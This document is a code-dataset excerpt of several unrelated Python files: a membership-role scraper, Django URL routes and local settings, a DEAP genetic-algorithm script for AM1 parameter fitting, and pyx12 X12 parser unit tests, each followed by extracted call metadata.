role_details["ce_check"] = parse(form.fields.get("ctl00$workarea$txt_p2_cecheck"))
# Disclosure Check
disclosure_with_date = form.fields.get("ctl00$workarea$txt_p2_disclosure")
if disclosure_with_date.startswith("Disclosure Issued : "):
disclosure_date = parse(disclosure_with_date.removeprefix("Disclosure Issued : "))
disclosure_check = "Disclosure Issued"
else:
disclosure_date = None
disclosure_check = disclosure_with_date
role_details["disclosure_check"] = disclosure_check # TODO extract date
role_details["disclosure_date"] = disclosure_date # TODO extract date
# References
role_details["references"] = references_codes.get(ref_code, ref_code)
approval_values = {}
for row in tree.xpath("//tr[@class='trProp']"):
select = row[1][0]
code = select.get("data-app_code")
approval_values[code] = select.get("data-db")
# select.get("title") gives title text, but this is not useful as it does not reflect latest changes,
# but only who added the role to Compass.
# Appointment Panel Approval
role_details["appointment_panel_approval"] = approval_values.get("ROLPRP|AACA")
# Commissioner Approval
role_details["commissioner_approval"] = approval_values.get("ROLPRP|CAPR")
# Committee Approval
role_details["committee_approval"] = approval_values.get("ROLPRP|CCA")
if role_details["line_manager_number"] in unset_vals:
role_details["line_manager_number"] = None
# Filter null values
role_details = {k: v for k, v in role_details.items() if v is not None}
# Getting Started
modules_output = {}
getting_started_modules = tree.xpath("//tr[@class='trTrain trTrainData']")
# Get all training modules and then extract the required modules to a dictionary
for module in getting_started_modules:
module_name = module[0][0].text.strip()
if module_name in module_names:
info = {
# "name": module_names[module_name], # short_name
"validated": parse(module[2][0].value), # Save module validation date
"validated_by": module[1][1].value or None, # Save who validated the module
}
mod_code = cast(module[2][0].get("data-ng_value")) # int or str
modules_output[renamed_modules[mod_code]] = info
# Get all levels of the org hierarchy and select those that will have information:
# Get all inputs with location data
org_levels = [v for k, v in sorted(dict(form.inputs).items()) if "ctl00$workarea$cbo_p1_location" in k]
# TODO
all_locations = {row.get("title"): row.findtext("./option") for row in org_levels}
clipped_locations = {
renamed_levels.get(key, key).lower(): value for key, value in all_locations.items() if value not in unset_vals
}
logger.debug(
f"Processed details for role number: {role_number}. "
f"Compass: {(post_response_time - start_time):.3f}s; Processing: {(time.time() - post_response_time):.4f}s"
)
# TODO data-ng_id?, data-rtrn_id?
full_details = {
"hierarchy": clipped_locations,
"details": role_details,
"getting_started": modules_output,
}
if self.validate:
return schema.MemberRolePopup.parse_obj(full_details)
else:
return full_details
| [((139, 15, 139, 40), 'lxml.html.fromstring', 'html.fromstring', ({(139, 31, 139, 39): 'response'}, {}), '(response)', False, 'from lxml import html\n'), ((235, 8, 235, 78), 'compass.core.logger.logger.debug', 'logger.debug', ({(235, 21, 235, 77): 'f"""getting roles tab for member number: {membership_num}"""'}, {}), "(f'getting roles tab for member number: {membership_num}')", False, 'from compass.core.logger import logger\n'), ((237, 15, 237, 40), 'lxml.html.fromstring', 'html.fromstring', ({(237, 31, 237, 39): 'response'}, {}), '(response)', False, 'from lxml import html\n'), ((340, 15, 340, 40), 'lxml.html.fromstring', 'html.fromstring', ({(340, 31, 340, 39): 'response'}, {}), '(response)', False, 'from lxml import html\n'), ((481, 15, 481, 40), 'lxml.html.fromstring', 'html.fromstring', ({(481, 31, 481, 39): 'response'}, {}), '(response)', False, 'from lxml import html\n'), ((586, 21, 586, 32), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((591, 29, 591, 40), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((170, 31, 170, 51), 'compass.core.utility.parse', 'parse', ({(170, 37, 170, 50): 'join_date_str'}, {}), '(join_date_str)', False, 'from compass.core.utility import parse\n'), ((192, 19, 192, 58), 'compass.core.schemas.member.MemberDetails.parse_obj', 'schema.MemberDetails.parse_obj', ({(192, 50, 192, 57): 'details'}, {}), '(details)', True, 'from compass.core.schemas import member as schema\n'), ((287, 19, 287, 63), 'compass.core.schemas.member.MemberRolesDict.parse_obj', 'schema.MemberRolesDict.parse_obj', ({(287, 52, 287, 62): 'roles_data'}, {}), '(roles_data)', True, 'from compass.core.schemas import member as schema\n'), ((460, 15, 460, 64), 'compass.core.schemas.member.MemberTrainingTab.parse_obj', 'schema.MemberTrainingTab.parse_obj', ({(460, 50, 460, 63): 'training_data'}, {}), '(training_data)', True, 'from compass.core.schemas import member as schema\n'), ((501, 19, 501, 62), 'compass.core.schemas.member.MemberPermitsList.parse_obj', 'schema.MemberPermitsList.parse_obj', ({(501, 54, 501, 61): 'permits'}, {}), '(permits)', True, 'from compass.core.schemas import member as schema\n'), ((593, 19, 593, 44), 'lxml.html.fromstring', 'html.fromstring', ({(593, 35, 593, 43): 'response'}, {}), '(response)', False, 'from lxml import html\n'), ((595, 19, 595, 52), 'lxml.html.fromstring', 'html.fromstring', ({(595, 35, 595, 51): 'response.content'}, {}), '(response.content)', False, 'from lxml import html\n'), ((693, 19, 693, 65), 'compass.core.schemas.member.MemberRolePopup.parse_obj', 'schema.MemberRolePopup.parse_obj', ({(693, 52, 693, 64): 'full_details'}, {}), '(full_details)', True, 'from compass.core.schemas import member as schema\n'), ((452, 19, 452, 64), 'compass.core.schemas.member.MemberMOGLList.parse_obj', 'schema.MemberMOGLList.parse_obj', ({(452, 51, 452, 63): 'training_ogl'}, {}), '(training_ogl)', True, 'from compass.core.schemas import member as schema\n'), ((495, 32, 495, 46), 'compass.core.utility.parse', 'parse', ({(495, 38, 495, 45): 'expires'}, {}), '(expires)', False, 'from compass.core.utility import parse\n'), ((87, 44, 87, 78), 'typing.get_args', 'get_args', ({(87, 53, 87, 77): 'MEMBER_PROFILE_TAB_TYPES'}, {}), '(MEMBER_PROFILE_TAB_TYPES)', False, 'from typing import get_args, Literal, TYPE_CHECKING, Union\n'), ((413, 40, 413, 75), 'compass.core.utility.maybe_int', 'maybe_int', ({(413, 50, 413, 74): 'training_advisor_data[0]'}, {}), '(training_advisor_data[0])', False, 'from compass.core.utility import maybe_int\n'), ((666, 33, 666, 58), 'compass.core.utility.parse', 'parse', ({(666, 39, 666, 57): 'module[2][0].value'}, {}), '(module[2][0].value)', False, 'from compass.core.utility import parse\n'), ((379, 69, 379, 100), 'compass.core.utility.maybe_int', 'maybe_int', ({(379, 79, 379, 99): 'validated_by_data[0]'}, {}), '(validated_by_data[0])', False, 'from compass.core.utility import maybe_int\n'), ((683, 14, 683, 25), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((589, 27, 589, 38), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n')] |
Quran-Tafseer/tafseer_api | quran_text/urls.py | 49eede15a6e50812a4bab1e0e1e38069fcb0da4d | from django.urls import path
from . import views
urlpatterns = [
path('',
view=views.SuraListView.as_view(), name='sura-list'),
path('<int:sura_num>/<int:number>/',
view=views.AyahTextView.as_view(), name='ayah-detail'),
path('<int:sura_num>/<int:number>',
view=views.AyahTextView.as_view()),
]
| [] |
IanSeng/CMPUT404_PROJECT | konnection/settings/local.py | 80acd2c57de4b091e0e66ad9f5f2df17801bf09e | from konnection.settings.base import *
from pathlib import Path
import os
import dotenv
# Build paths inside the project like this: BASE_DIR / 'subdir'.
BASE_DIR = Path(__file__).resolve().parent.parent.parent
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
SECRET_KEY = 'temporaryKey'
# For tests
# https://stackoverflow.com/a/35224204
TEST_RUNNER = 'django_nose.NoseTestSuiteRunner'
NOSE_ARGS = ['--with-spec', '--spec-color']
# Adding secrets to env file
# From StackOverflow https://stackoverflow.com/a/61437799
# From Zack Plauché https://stackoverflow.com/users/10415970/zack-plauch%c3%a9
dotenv_file = os.path.join(BASE_DIR, ".env")
if os.path.isfile(dotenv_file):
dotenv.load_dotenv(dotenv_file)
# Connecting PostgreSQL to Django
# From https://www.digitalocean.com/community/tutorials/how-to-use-postgresql-with-your-django-application-on-ubuntu-14-04
# From Digital Ocean
# From Justin Ellingwood https://www.digitalocean.com/community/users/jellingwood
if os.getenv('GITHUB_WORKFLOW'):
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'github-actions',
'USER': 'postgres',
'PASSWORD': 'postgres',
'HOST': 'localhost',
'PORT': '5432'
}
}
else:
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql_psycopg2',
'NAME': 'myproject',
'USER': os.environ['DB_USER'],
'PASSWORD': os.environ['DB_PASSWORD'],
'HOST': 'localhost',
'PORT': '',
}
} | [((23, 14, 23, 44), 'os.path.join', 'os.path.join', ({(23, 27, 23, 35): 'BASE_DIR', (23, 37, 23, 43): '""".env"""'}, {}), "(BASE_DIR, '.env')", False, 'import os\n'), ((24, 3, 24, 30), 'os.path.isfile', 'os.path.isfile', ({(24, 18, 24, 29): 'dotenv_file'}, {}), '(dotenv_file)', False, 'import os\n'), ((31, 3, 31, 31), 'os.getenv', 'os.getenv', ({(31, 13, 31, 30): '"""GITHUB_WORKFLOW"""'}, {}), "('GITHUB_WORKFLOW')", False, 'import os\n'), ((25, 4, 25, 35), 'dotenv.load_dotenv', 'dotenv.load_dotenv', ({(25, 23, 25, 34): 'dotenv_file'}, {}), '(dotenv_file)', False, 'import dotenv\n'), ((8, 11, 8, 25), 'pathlib.Path', 'Path', ({(8, 16, 8, 24): '__file__'}, {}), '(__file__)', False, 'from pathlib import Path\n')] |
PotentialParadox/PyReparm | main.py | 70062e351eebacb9c6cb3dc0262e97256c52be3d | import random
from evaluation import Evaluator
from generator import generator
from mutate import mutateset
from deap import base
from deap import creator
from deap import tools
from parameter_group import ParameterGroup
import gaussian_output
from analysis import Analysis
from gaussian_input import GaussianInput
from gaussian import gaussian_single
from header import Header
from reparm_data import ReparmData
from genesis import Genesis
import numpy as np
from scipy.optimize import minimize
from copy import deepcopy
from sklearn.cross_validation import train_test_split
from sklearn.preprocessing import StandardScaler
from sklearn import svm
from sklearn.linear_model import RidgeCV
from sklearn.ensemble import RandomForestRegressor
#############################################
# BEGIN USER INPUT
#############################################
fin = open("reparm.in", 'r')
file = fin.read()
reparm_data = ReparmData(file)
if reparm_data.reparm_input.should_continue:
reparm_data.load()
else:
Genesis(reparm_data=reparm_data)
reparm_data.save()
############################################
# END USER INPUT
############################################
#############################################
# BEGIN USER INPUT
#############################################
# Number of Generation
NGEN = reparm_data.reparm_input.number_generations
# PopulationSize
PSIZE = reparm_data.reparm_input.population_size
# Crossover Probability
CXPB = reparm_data.reparm_input.crossover_probability
# Mutation Probability
# How likely and individual will be mutated
MUTPB = reparm_data.reparm_input.mutation_probability
# Mutation Rate
# How likely a member of an individual will be mutated
MUTR = reparm_data.reparm_input.mutation_rate
# Crowding Factor
CWD = reparm_data.reparm_input.crowding_factor
# Mutation Perturbation
MUTPT = reparm_data.reparm_input.mutation_perturbation
# Initial Perturbation
IMUTPT = 0.05
# Initial List of parameters
IL = []
for i in range(0, len(reparm_data.best_am1_individual.inputs[0].parameters[0].p_floats), 4):
IL.append(reparm_data.best_am1_individual.inputs[0].parameters[0].p_floats[i])
# The evaluator (fitness, cost) function
eval = Evaluator(reparm_data=reparm_data)
if reparm_data.best_fitness is None:
reparm_data.best_fitness = list(eval.eval(IL))
reparm_data.original_fitness = deepcopy(reparm_data.best_fitness)
else:
reparm_data.best_fitness = list(eval.eval(IL))
print("original_fitness", reparm_data.original_fitness)
print("starting at", reparm_data.best_fitness)
#############################################
# END USER INPUT
#############################################
#############################################
# BEGIN DEAP SETUP
#############################################
creator.create("FitnessMax", base.Fitness, weights=(-1.0, 0, 0))
creator.create("ParamSet", list, fitness=creator.FitnessMax, best=None)
toolbox = base.Toolbox()
toolbox.register("individual", generator, IL, IMUTPT)
toolbox.register("population", tools.initRepeat, list, toolbox.individual)
toolbox.register("mate", tools.cxSimulatedBinary)
toolbox.register("mutate", mutateset, pert=MUTPT, chance=MUTR)
toolbox.register("select", tools.selTournament, tournsize=3)
toolbox.register("evaluate", eval.eval)
pop = toolbox.population(n=PSIZE)
#############################################
# END DEAP SETUP
#############################################
#############################################
# BEGIN GENETIC ALGORITHM
#############################################
for g in range(NGEN):
print("Starting gen:", g)
offspring = toolbox.select(pop, len(pop))
offspring = list(map(toolbox.clone, offspring))
for child1, child2 in zip(offspring[::2], offspring[1::2]):
if random.random() < CXPB:
toolbox.mate(child1, child2, CWD)
del child1.fitness.values
del child2.fitness.values
for mutant in offspring:
if random.random() < MUTPB:
toolbox.mutate(mutant)
del mutant.fitness.values
invalid_ind = [ind for ind in offspring if not ind.fitness.valid]
fitnesses = []
for i in invalid_ind:
try:
fitness = toolbox.evaluate(i)
fitnesses.append(fitness)
reparm_data.observations.append(list(i))
i.fitness.values = fitness
if not reparm_data.best_fitness or fitness[0] < reparm_data.best_fitness[0]:
print("Previous Best", reparm_data.best_fitness)
reparm_data.best_fitness = list(fitness)
reparm_data.best_am1_individual.set_pfloats(i)
print("NewBest Found:", reparm_data.best_fitness)
except TypeError:
fitnesses.append(None)
reparm_data.save()
pop[:] = offspring
#############################################
# End Genetic Algorithm
#############################################
#############################################
# Begin Particle Simulation
#############################################
# for g in range(NGEN):
# for part in pop:
# part.fitness.values = toolbox.evaluate(part)
# if not part.best or part.best.fitness < part.fitness:
# part.best = creator.ParamSet(part)
# part.best.fitness.values = part.fitness.values
# if not best or best.fitness < part.fitness:
# best = creator.ParamSet(part)
# best.fitness.values = part.fitness.values
# for part in pop:
# toolbox.mutate(part)
# print(best, "with fitness", best.fitness)
#############################################
# End Particle Simulation
#############################################
#############################################
# Begin Print Out
#############################################
gin_best = reparm_data.best_am1_individual.inputs[0]
s_opt_header = "#P AM1(Input,Print) opt\n\nAM1\n"
opt_header = Header(s_opt_header)
gin_opt = GaussianInput(header=opt_header,
coordinates=gin_best.coordinates[0],
parameters=gin_best.parameters[0])
fout = open("reparm_best_opt.com", 'w')
fout.write(gin_opt.str())
fout.close()
try:
gout = gaussian_single(gin_opt.str())
fout = open("reparm_best_opt.log", 'w')
fout.write(gout)
fout.close()
except TypeError:
print("Could not get output file from input,"
"most likely, optimization failed to converge")
#############################################
# End Print Out
#############################################
#############################################
# Begin ScikitLearn
#############################################
# # Preprocessor
# targets = np.array(reparm_data.targets)
# X = np.array(reparm_data.observations)
# y = targets[:, 0] # 0, 1, 2 for total, energy, and dipole
# X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.1)
# stdsc = StandardScaler()
# X_train_std = stdsc.fit_transform(X_train)
# X_test_std = stdsc.transform(X_test)
#
# # Training
# clf = svm.SVR(C=1.3, kernel='rbf')
# # clf = RandomForestRegressor(n_estimators=20)
# clf.fit(X_train, y_train)
# print("Using {} samples with fitness score {}".format(len(y), clf.score(X_test, y_test)))
#
# initial_guess = np.array(IL)
# fun = lambda x: clf.predict(stdsc.transform(x.reshape(1, -1)))
# print("Predicting best parameters")
# min_params = (minimize(fun, initial_guess)).x
# stdsc.inverse_transform(min_params)
# params = min_params.tolist()
# skl_best = deepcopy(reparm_data.best_am1_individual)
# skl_best.set_pfloats(params)
# open("skl_best.com", 'w').write(skl_best.inputs[0].str())
# skl_fitness = eval.eval(params)
# if skl_fitness:
# print("skl_fitness:", skl_fitness)
#############################################
# End ScikitLearn
#############################################
#############################################
# Begin Analysis
#############################################
anal = Analysis(reparm_data)
anal.trithiophene()
#############################################
# End Analysis
#############################################
| [((30, 14, 30, 30), 'reparm_data.ReparmData', 'ReparmData', ({(30, 25, 30, 29): 'file'}, {}), '(file)', False, 'from reparm_data import ReparmData\n'), ((67, 7, 67, 41), 'evaluation.Evaluator', 'Evaluator', (), '', False, 'from evaluation import Evaluator\n'), ((86, 0, 86, 64), 'deap.creator.create', 'creator.create', (), '', False, 'from deap import creator\n'), ((87, 0, 87, 71), 'deap.creator.create', 'creator.create', (), '', False, 'from deap import creator\n'), ((89, 10, 89, 24), 'deap.base.Toolbox', 'base.Toolbox', ({}, {}), '()', False, 'from deap import base\n'), ((164, 13, 164, 33), 'header.Header', 'Header', ({(164, 20, 164, 32): 's_opt_header'}, {}), '(s_opt_header)', False, 'from header import Header\n'), ((165, 10, 167, 58), 'gaussian_input.GaussianInput', 'GaussianInput', (), '', False, 'from gaussian_input import GaussianInput\n'), ((222, 7, 222, 28), 'analysis.Analysis', 'Analysis', ({(222, 16, 222, 27): 'reparm_data'}, {}), '(reparm_data)', False, 'from analysis import Analysis\n'), ((34, 4, 34, 36), 'genesis.Genesis', 'Genesis', (), '', False, 'from genesis import Genesis\n'), ((70, 35, 70, 69), 'copy.deepcopy', 'deepcopy', ({(70, 44, 70, 68): 'reparm_data.best_fitness'}, {}), '(reparm_data.best_fitness)', False, 'from copy import deepcopy\n'), ((111, 11, 111, 26), 'random.random', 'random.random', ({}, {}), '()', False, 'import random\n'), ((116, 11, 116, 26), 'random.random', 'random.random', ({}, {}), '()', False, 'import random\n')] |
arenius/pyx12 | pyx12/test/test_x12context.py | 537493deaa0b8e18a3fa72eb1b3eeae9ef043b11 | import unittest
#import tempfile
try:
from StringIO import StringIO
except:
from io import StringIO
import pyx12.error_handler
from pyx12.errors import EngineError # , X12PathError
import pyx12.x12context
import pyx12.params
from pyx12.test.x12testdata import datafiles
class X12fileTestCase(unittest.TestCase):
def setUp(self):
self.param = pyx12.params.params()
def _makeFd(self, x12str=None):
try:
if x12str:
fd = StringIO(x12str)
else:
fd = StringIO()
except:
if x12str:
fd = StringIO(x12str, encoding='ascii')
else:
fd = StringIO(encoding='ascii')
fd.seek(0)
return fd
class Delimiters(X12fileTestCase):
def test_arbitrary_delimiters(self):
str1 = 'ISA&00& &00& &ZZ&ZZ000 &ZZ&ZZ001 &030828&1128&U&00401&000010121&0&T&!+\n'
str1 += 'GS&HC&ZZ000&ZZ001&20030828&1128&17&X&004010X098A1+\n'
str1 += 'ST&837&11280001+\n'
str1 += 'REF&87&004010X098A1+\n'
str1 += 'SE&3&11280001+\n'
str1 += 'GE&1&17+\n'
str1 += 'IEA&1&000010121+\n'
fd = self._makeFd(str1)
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in src.iter_segments():
pass
self.assertEqual(src.subele_term, '!')
self.assertEqual(src.ele_term, '&')
self.assertEqual(src.seg_term, '+')
def test_binary_delimiters(self):
str1 = 'ISA&00& &00& &ZZ&ZZ000 &ZZ&ZZ001 &030828&1128&U&00401&000010121&0&T&!+\n'
str1 += 'GS&HC&ZZ000&ZZ001&20030828&1128&17&X&004010X098A1+\n'
str1 += 'ST&837&11280001+\n'
str1 += 'REF&87&004010X098A1+\n'
str1 += 'SE&3&11280001+\n'
str1 += 'GE&1&17+\n'
str1 += 'IEA&1&000010121+\n'
str1 = str1.replace('&', chr(0x1C))
str1 = str1.replace('+', chr(0x1D))
str1 = str1.replace('!', chr(0x1E))
fd = self._makeFd(str1)
errors = []
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in src.iter_segments():
pass
self.assertEqual(src.subele_term, chr(0x1E))
self.assertEqual(src.ele_term, chr(0x1C))
self.assertEqual(src.seg_term, chr(0x1D))
class TreeGetValue(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_get_line_numbers_2200(self):
loop2400 = self.loop2300.first('2400')
self.assertEqual(self.loop2300.seg_count, 19)
self.assertEqual(self.loop2300.cur_line_number, 21)
for seg in loop2400.select('CLM'):
self.assertEqual(seg.seg_count, 25)
self.assertEqual(seg.cur_line_number, 2271)
break
def test_get_line_numbers_2400(self):
loop2400 = self.loop2300.first('2400')
self.assertEqual(loop2400.seg_count, 35)
self.assertEqual(loop2400.cur_line_number, 37)
for svc in loop2400.select('SV1'):
self.assertEqual(svc.seg_count, 36)
self.assertEqual(svc.cur_line_number, 38)
break
def test_get_seg_value(self):
self.assertEqual(self.loop2300.get_value('CLM02'), '21')
self.assertEqual(self.loop2300.get_value('CLM99'), None)
def test_get_seg_value_fail_no_element_index(self):
self.assertRaises(IndexError, self.loop2300.get_value, 'CLM')
def test_get_parent_value(self):
loop2400 = self.loop2300.first('2400')
self.assertEqual(loop2400.get_value('../CLM01'), '3215338')
self.assertEqual(loop2400.get_value('../2310B/NM109'), '222185735')
def test_get_seg_value_idx(self):
for clm in self.loop2300.select('CLM'):
self.assertEqual(clm.get_value('02'), '21')
self.assertEqual(clm.get_value('05-3'), '1')
def test_get_first_value(self):
self.assertEqual(self.loop2300.get_value('2400/SV101'), 'HC:H2015:TT')
self.assertEqual(self.loop2300.get_value('2400/SV101-2'), 'H2015')
self.assertEqual(self.loop2300.get_value('2400/REF[6R]02'), '1057296')
self.assertEqual(self.loop2300.get_value('2400/2430/SVD02'), '21')
self.assertEqual(self.loop2300.get_value('2400/AMT[AAE]02'), '21')
def test_get_first_value_2400(self):
loop2400 = self.loop2300.first('2400')
self.assertEqual(loop2400.get_value('AMT[AAE]02'), '21')
self.assertEqual(loop2400.get_value('2430/AMT[AAE]02'), None)
def test_get_no_value(self):
self.assertEqual(self.loop2300.get_value('2400/SV199'), None)
self.assertEqual(self.loop2300.get_value('2400'), None)
def test_get_parent_no_value(self):
loop2400 = self.loop2300.first('2400')
self.assertEqual(loop2400.get_value('../2310E/NM109'), None)
def test_get_specific_qual(self):
self.assertEqual(self.loop2300.get_value('2400/REF[6R]02'), '1057296')
self.assertEqual(self.loop2300.get_value('2400/REF[G1]02'), None)
self.assertEqual(self.loop2300.get_value('2400/REF[XX]02'), None)
class TreeSetValue(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_set_seg_value(self):
self.loop2300.set_value('CLM02', '50')
self.assertEqual(self.loop2300.get_value('CLM02'), '50')
def test_set_first_value_2400(self):
loop2400 = self.loop2300.first('2400')
loop2400.set_value('AMT[AAE]02', '25')
self.assertEqual(loop2400.get_value('AMT[AAE]02'), '25')
class TreeSelect(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
self.param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
#def test_select_loop_and_parent(self):
# loop2400 = self.loop2300.first('2400')
# assert loop2400.id == '2400', 'Not in 2400'
# ct = 0
# newtree = loop2400.parent
# for newtree in loop2400.select('../'):
# self.assertEqual(newtree.id, '2300')
# ct += 1
# self.assertEqual(ct, 1)
def test_select_loops(self):
ct = 0
for newtree in self.loop2300.select('2400'):
self.assertEqual(newtree.id, '2400')
ct += 1
self.assertEqual(ct, 2)
def test_select_seg(self):
ct = 0
for newtree in self.loop2300.select('2400/SV1'):
self.assertEqual(newtree.id, 'SV1')
self.assertEqual(newtree.get_value('SV102'), '21')
ct += 1
self.assertEqual(ct, 2)
def test_select_parent_seg(self):
loop2400 = self.loop2300.first('2400')
assert loop2400.id == '2400', 'Not in 2400'
ct = 0
for newtree in loop2400.select('../CLM'):
self.assertEqual(newtree.id, 'CLM')
self.assertEqual(newtree.get_value('CLM01'), '3215338')
ct += 1
self.assertEqual(ct, 1)
def test_select_from_st(self):
fd = self._makeFd(datafiles['835id']['source'])
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
ct = 0
for datatree in src.iter_segments('ST_LOOP'):
if datatree.id == 'ST_LOOP':
for claim in datatree.select('DETAIL/2000/2100'):
self.assertEqual(claim.id, '2100')
ct += 1
self.assertEqual(
ct, 3, 'Found %i 2100 loops. Should have %i' % (ct, 3))
def test_select_from_gs(self):
fd = self._makeFd(datafiles['simple_837i']['source'])
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
ct = 0
for datatree in src.iter_segments('GS_LOOP'):
if datatree.id == 'GS_LOOP':
for sub in datatree.select('ST_LOOP/DETAIL/2000A/2000B/2300/2400'):
self.assertEqual(sub.id, '2400')
ct += 1
self.assertEqual(
ct, 6, 'Found %i 2400 loops. Should have %i' % (ct, 6))
class TreeSelectFromSegment(X12fileTestCase):
def test_select_from_seg_fail(self):
fd = self._makeFd(datafiles['835id']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in src.iter_segments('ST_LOOP'):
if datatree.id == 'GS':
#self.assertFalseRaises(AttributeError, datatree.select, 'DETAIL/2000/2100')
for claim in datatree.select('DETAIL/2000/2100'):
pass
class TreeAddSegment(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_add_new_plain(self):
seg_data = pyx12.segment.Segment('HCP*00*7.11~', '~', '*', ':')
new_node = self.loop2300.add_segment(seg_data)
self.assertNotEqual(new_node, None)
def test_add_new_id(self):
seg_data = pyx12.segment.Segment('REF*F5*6.11~', '~', '*', ':')
new_node = self.loop2300.add_segment(seg_data)
self.assertNotEqual(new_node, None)
def test_add_new_not_exists(self):
seg_data = pyx12.segment.Segment('ZZZ*00~', '~', '*', ':')
self.assertRaises(pyx12.errors.X12PathError,
self.loop2300.add_segment, seg_data)
class TreeAddSegmentString(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_add_new_plain(self):
new_node = self.loop2300.add_segment('HCP*00*7.11~')
self.assertNotEqual(new_node, None)
def test_add_new_id(self):
new_node = self.loop2300.add_segment('REF*F5*6.11')
self.assertNotEqual(new_node, None)
def test_add_new_not_exists(self):
self.assertRaises(pyx12.errors.X12PathError,
self.loop2300.add_segment, 'ZZZ*00~')
class SegmentExists(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
self.param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_qual_segment(self):
self.assertTrue(self.loop2300.exists('2310B'))
self.assertTrue(self.loop2300.exists('2310B/NM1[82]'))
for loop2310b in self.loop2300.select('2310B'):
self.assertTrue(loop2310b.exists('NM1'))
self.assertTrue(loop2310b.exists('NM1[82]'))
def test_qual_segment_sub_loop(self):
self.assertTrue(self.loop2300.exists('2400/2430'))
self.assertTrue(self.loop2300.exists('2400/2430/DTP[573]'))
self.assertFalse(self.loop2300.exists('2400/2430/DTP[111]'))
self.assertTrue(self.loop2300.exists('2400/2430/DTP[573]03'))
def test_qual_segment_select_sub_loop(self):
loop2430 = self.loop2300.first('2400/2430')
self.assertTrue(loop2430.exists('DTP'))
self.assertTrue(loop2430.exists('DTP[573]'))
self.assertTrue(loop2430.exists('DTP[573]03'))
def test_qual_834_dtp(self):
fd = self._makeFd(datafiles['834_lui_id']['source'])
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(self.param, errh, fd)
for datatree in src.iter_segments('2300'):
if datatree.id == '2300':
loop2300 = datatree
break
self.assertTrue(loop2300.exists('DTP[348]'))
self.assertFalse(loop2300.exists('DTP[349]'))
class TreeAddLoop(X12fileTestCase):
def setUp(self):
fd = self._makeFd(datafiles['simple_837p']['source'])
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
self.src = pyx12.x12context.X12ContextReader(param, errh, fd)
for datatree in self.src.iter_segments('2300'):
if datatree.id == '2300':
self.loop2300 = datatree
break
def test_add_new_plain(self):
seg_data = pyx12.segment.Segment(
'NM1*82*2*Provider 1*****ZZ*9898798~', '~', '*', ':')
new_node = self.loop2300.add_loop(seg_data)
self.assertNotEqual(new_node, None)
self.assertTrue(self.loop2300.exists('2310B'))
for loop2310b in self.loop2300.select('2310B'):
self.assertTrue(loop2310b.exists('NM1'))
self.assertTrue(loop2310b.exists('NM1[82]'))
def test_add_new_string_seg(self):
old_ct = self.loop2300.count('2400')
new_node = self.loop2300.add_loop('LX*5~')
self.assertNotEqual(new_node, None)
self.assertTrue(self.loop2300.exists('2400'))
self.assertEqual(old_ct + 1, self.loop2300.count('2400'))
for loop2400 in self.loop2300.select('2400'):
self.assertTrue(loop2400.exists('LX'))
class TreeAddLoopDetail(X12fileTestCase):
def test_add_loops_under_detail(self):
str1 = 'ISA&00& &00& &ZZ&ZZ000 &ZZ&ZZ001 &030828&1128&U&00401&000010121&0&T&!+\n'
str1 += 'GS&BE&ZZ000&ZZ001&20030828&1128&17&X&004010X095A1+\n'
str1 += 'ST&834&11280001+\n'
str1 += 'BGN&+\n'
str1 += 'INS&Y&18&30&XN&AE&RT+\n'
str1 += 'SE&4&11280001+\n'
str1 += 'GE&1&17+\n'
str1 += 'IEA&1&000010121+\n'
fd = self._makeFd(str1)
errors = []
param = pyx12.params.params()
errh = pyx12.error_handler.errh_null()
src = pyx12.x12context.X12ContextReader(param, errh, fd)
for st_loop in src.iter_segments('ST_LOOP'):
if st_loop.id == 'ST_LOOP' and st_loop.exists('DETAIL'):
detail = st_loop.first('DETAIL')
self.assertTrue(detail.exists('2000'))
detail.first('2000').delete()
self.assertFalse(detail.exists('2000'))
